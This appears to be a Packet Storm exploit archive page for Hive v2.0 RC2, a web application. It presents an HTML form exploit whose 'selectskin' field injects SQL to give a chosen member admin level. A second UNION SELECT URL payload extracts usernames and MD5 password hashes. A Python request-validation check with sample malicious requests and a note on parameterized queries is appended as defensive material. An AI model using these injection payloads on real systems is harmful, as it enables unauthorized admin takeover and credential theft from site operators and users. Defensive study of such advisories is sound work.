digitalhive-sql.txt

Date: 11 Jan 2008 00:00:00
Reported by: j0j0
Type: packetstorm
Source: packetstormsecurity.com

Hive v2.0 RC2 Remote SQL Injection by j0j0. The exploit requires creating an account and logging in, then submitting the form with its action URL modified; the injected SQL gains admin access. A second injection goes through URL parameters: change {HOST}, {PATH}, {SQL_PREFIX}, and {MEMBER_ID}, then read LOGIN:MD5_PASSWORD from the "Pseudonyme" field.

Code
```html
<!--
Hive v2.0 RC2 Remote SQL Injection
c0ded by j0j0
-->
<html>
<head>
<style type="text/css">
body {
margin:3%;
font-size:10px;
color:#FFFFFF;
font-family:Verdana,Arial;
background-color:#1a1a1a;
text-align: center;
}
input {
background:#303030;
color:#FFFFFF;
font-family:Verdana,Arial;
font-size:10px;
vertical-align:middle;
border-left:1px solid #5d5d5d;
border-right:1px solid #121212;
border-bottom:1px solid #121212;
border-top:1px solid #5d5d5d;
padding: 3px;
margin: 2px;
}
input[type=text] {
width: 200px;
}
textarea {
background:#303030;
color:#FFFFFF;
font-family:Verdana,Arial;
font-size:10px;
vertical-align:middle;
border-left:1px solid #121212;
border-right:1px solid #5d5d5d;
border-bottom:1px solid #5d5d5d;
border-top:1px solid #121212;
}
table td {
font-size: 10px;
font-family: Verdana, Arial;
}
h3 { color: #CC0000; }
a {
color: #999999;
text-decoration: none;
font-weight: bold;
}
#exploit {
font-family: Courier New, sans-ms;
font-size: 12px;
color: #00FF00;
width: 400px;
text-align: left;
}
</style>
</head>
<body>
<center>
<h3>Hive v2.0 RC2 Remote SQL Injection<br /><br />-= c0ded by j0j0 =-</h3>
<br />
<p>you must first create an account, and log in.<br />
then you can send exploit<br />
<span style="color:#cc0000;">don't forget to change the action="" URL of this form</span></p>
<p>&nbsp;</p>

<table width="600px" cellspacing="1">
<tr>
<td width="20%" class="td5_2">Username</td>
<td class="td5_1"><input type="text" name="id" value="admin" /></td>
<td>you will use this username to login</td>
</tr>
<tr>
<td class="td5_2">Password</td>
<td class="td5_1"><input type="text" name="password" value="admin" /></td>
<td>you will use this password to login</td>
</tr>
<tr>
<td class="td5_2">Mail</td>
<td class="td5_1"><input type="text" class="texte" name="mail" size="24" value="[email protected]" /></td>
<td>email doesn't have importance</td>
</tr>
<tr>
<td class="td5_2">SQL Injection</td>
<td colspan="3" class="td5_1">
<input name="selectskin" type="text" value="purpletech', niveau_num=4 WHERE num=2 /*"/>
</td>
</tr>
</table>
<p>purpletech', niveau_num=4 WHERE num=2 /* <-- niveau_num is for admin access / num is the member id (default admin id is 2)<br /></p>
<br>
<input type="submit" name="submitButtonName" value="Attack">
<p>&nbsp;</p>
<p>Now you are admin, logout and re-login with new username/password</p>
<p>There is another one injection :
<div style="max-width:500px;">
http://{HOST}/{PATH}/base.php?page=gestion_membre.php&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/

0,concat(nick,char(58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/_user/**/WHERE<br />/**/{SQL_PREFIX}_user.num={MEMBER_ID}/**//*<br />
</div>
<br /><br />
Change {HOST}, {PATH}, {SQL_PREFIX} and {MEMBER_ID}<br />
then look at the "Pseudonyme" field, you've got LOGIN:MD5_PASSWORD)</p>
<!--
Hidden inputs
-->
<input type="hidden" class="texte" name="nom" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="prenom" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="age" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="icq" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="adresse" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="msn" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="aim" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="hobbie" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="yahoo" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="site" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="text" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="selectlangue" size="24" value="h4ck3d" >
<input type="hidden" value="false" name="online" >
</form>
</center>
</body>
</html>
```
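
A compensating check for the two injection points named above, as an added example that is not part of the original advisory or of Hive's code: it validates `user_id` and `selectskin` against allowlists, which still holds when a payload replaces spaces with `/**/` as the URL above does. The patterns for valid ids and skin names, the sample host and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: legitimate member ids are plain decimal integers and skin
# names are short identifiers; adjust both to the deployed application.
USER_ID_OK = re.compile(r"\d{1,10}")
SKIN_OK = re.compile(r"[A-Za-z0-9_-]{1,32}")


def audit_request(url, body=""):
    """Return findings for one request; an empty list means it passed."""
    findings = []
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)

    # GET vector: user_id on the gestion_membre.php page.
    if "gestion_membre.php" in query.get("page", []):
        for value in query.get("user_id", []):
            if not USER_ID_OK.fullmatch(value):
                findings.append(("user_id", value))

    # POST vector: the selectskin form field, wherever the form is posted.
    for value in form.get("selectskin", []) + query.get("selectskin", []):
        if not SKIN_OK.fullmatch(value):
            findings.append(("selectskin", value))
    return findings


# Constructed sample traffic (host, path and values are made up).
SAMPLES = [
    ("http://hive.example.test/base.php?page=gestion_membre.php"
     "&var=profil&user_id=7", ""),
    ("http://hive.example.test/base.php?page=gestion_membre.php"
     "&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/0", ""),
    ("http://hive.example.test/base.php", "id=bob&selectskin=purpletech"),
    ("http://hive.example.test/base.php",
     "id=bob&selectskin=purpletech%27%2C+niveau_num%3D4+WHERE+num%3D2+%2F%2A"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(audit_request(url, body) or "ok")
```

The fix in the application itself is to bind both values as query parameters; this check only filters or flags requests in front of unpatched code.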
